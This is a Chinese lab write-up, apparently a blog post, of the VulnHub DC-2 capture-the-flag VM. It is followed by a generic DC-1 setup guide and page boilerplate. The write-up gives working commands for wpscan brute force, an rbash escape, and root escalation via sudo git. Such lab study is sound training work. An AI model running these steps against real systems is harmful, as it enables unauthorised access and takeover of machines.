DC-2靶场搭建及渗透

 

一,靶场搭建

DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip

搭建过程和DC-1一样,将kali跟DC-2放同一网段即可

kali和dc-1都是NAT模式

二,渗透测试

第一个flag

主机探活

nmap -sV 192.168.75.0/24

192.168.75.130最有可能是靶机

进一步扫描

nmap -A -p- -v 192.168.75.130

发现开放80端口和7744端口

依据官方文档提示访问80端口需要在/etc/hosts文件中添加解析

火狐浏览器中输入http://dc-2,访问成功

拿到第一个flag

第二个flag

翻译第一个flag提示cewl

cewl:Kali Linux字典生成工具Cewl

cewl dc-2 -w pass.txt

cat pass.txt

生成字典做什么?爆破 寻找爆破点

nikto -url http://dc-2 -c all

或者

dirb http://dc-2

扫描到一个http://dc-2/wp-admin/,访问一下出现登陆页面

尝试爆破

但是缺少用户名字典,用wpscan进行用户枚举,再配合密码字典会提高效率

得到以下三个用户名,写进一个用户名字典

wpscan --url http://dc-2 -e u

vim user.txt

字典都有了,接下来就是爆破

wpscan --url http://dc-2 -U user.txt -P pass.txt

得到两个用户名和对应的密码

http://dc-2/wp-admin/页面登录尝试

jerry账户中有flag,tom账户中没有

提示

第三个flag

ssh:7744端口还没有用到,用得到的账号密码连接7744端口

只有tom可以连接

看一看自己是谁,权限是怎样的,可以使用的命令

rbash是Restricted bash缩写,即受限制的bash。

管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。

在rbash中,很多行为和命令都会被受到限制。

ls

less flag3.txt

vi flag3.txt

第四个flag

第三个flag提示我们我们使用su来切换到jerry来找到进一步的线索

rbash有限制就绕过rbash的限制

调用/bin/sh命令解释器

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a

$ /bin/bash

tom@DC-2:~$ export PATH=$PATH:/bin/

tom@DC-2:~$ export PATH=$PATH:/usr/bin

su jerry

find / -name flag4.txt

cat /home/jerry/flag4.txt

第五个flag

git很扎眼,虽然他让我滚出去!!!

输入sudo -l发现可以使用git命令,可以使用root权限,但不需要root密码

用git提权

用root权限调用命令git,进入help配置文件

sudo git help config

!/bin/bash

!/bin/sh

sudo git help add

!/bin/bash

!/bin/sh

whoami

passwd root #修改root密码

cat final-flag.txt

well done

### VulnHub CMS DC 靶场环境搭建教程 #### 下载靶场 VulnHub 提供了一个名为 DC 的系列实验靶场,非常适合安全爱好者和渗透测试初学者进行学习和实践。这个平台允许用户下载多种虚拟机,这些虚拟机预装了各种漏洞,以便于在本地环境中进行渗透测试、提权、漏洞利用和代码审计等操作[^1]。 对于特定的 CMS DC 系列,可以访问 VulnHub 官方网站获取更多详情和下载链接。具体到 DC-1 这一入门级别的靶机,其官方描述表明这是一个特意建造的易受攻击的实验室,旨在帮助新手积累渗透测试的经验。目标是在该环境中取得 root 权限并找到五个 flag[^2]。 #### 环境准备 为了顺利开展实验,在下载完成后需确保拥有合适的虚拟化软件来运行所得到的 .ova 文件,比如 VirtualBox 或 VMware Player。安装完毕后按照提示导入 OVA 文件即可完成部署工作。 #### 开始探索 一旦启动 VM 并连接网络,可以通过 nmap 扫描确认开放的服务端口: ```bash nmap -A <target_ip> ``` 根据已知信息,DC-1 主要暴露了如下几个服务: - SSH (Port 22): 使用 OpenSSH 6.0p1 版本。 - Web Service (Port 80): 基于 Apache httpd 2.2.22 和 Drupal 7 构建。 - RPCBind (Port 111)[^4] 考虑到 Web 应用程序可能存在的风险点,建议使用 WPScan 对任何基于 WordPress 的组件进行全面审查;尽管此案例中的 CMS 是 Drupal 而不是 WordPress,但对于其他类型的 CMS 工具也有类似的专用扫描器可供选用[^3]。 通过上述步骤,便能建立起一个完整的 VulnHub CMS DC 实验室环境用于后续的学习与研究活动之中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值